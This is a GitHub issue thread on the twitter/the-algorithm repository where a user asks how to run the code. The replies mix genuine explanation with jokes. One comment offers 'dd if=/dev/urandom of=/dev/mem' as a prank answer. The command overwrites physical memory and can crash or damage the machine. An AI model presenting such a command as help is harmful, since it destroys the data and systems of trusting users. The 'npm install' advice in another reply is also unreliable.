### ISSUE TITLE
How do I run this repo?

### ISSUE THREAD

**Issue by Richmond-Nunoo** [twitter/the-algorithm#789]

**Comment by MarsDoge** [comment]
I also want to know

**Comment by jeroensmink98** [comment]
Just run `npm install` and `npm run dev|`  from the root of the project that should work

**Comment by alexanderhorner** [comment]
Right now the code is incomplete so you won't be able to just run it out of the box. But twitter has promised to release more over time. 

Acid test is that independent third parties should be able to determine, with reasonable accuracy, what will probably be shown to users.

**Comment by jumalaw98** [comment]
This will be nice enough, as they are working on the process to be more open and understandable to outside observers or end users

**Comment by mutexdeveloper** [comment]
dd if=/dev/urandom of=/dev/mem

**Comment by 0o120** [comment]
You need to pay $43,000,000,000 to be able to run the code.

**Comment by jdm-twtr** [comment]
This issue was closed due to lack of useful description.
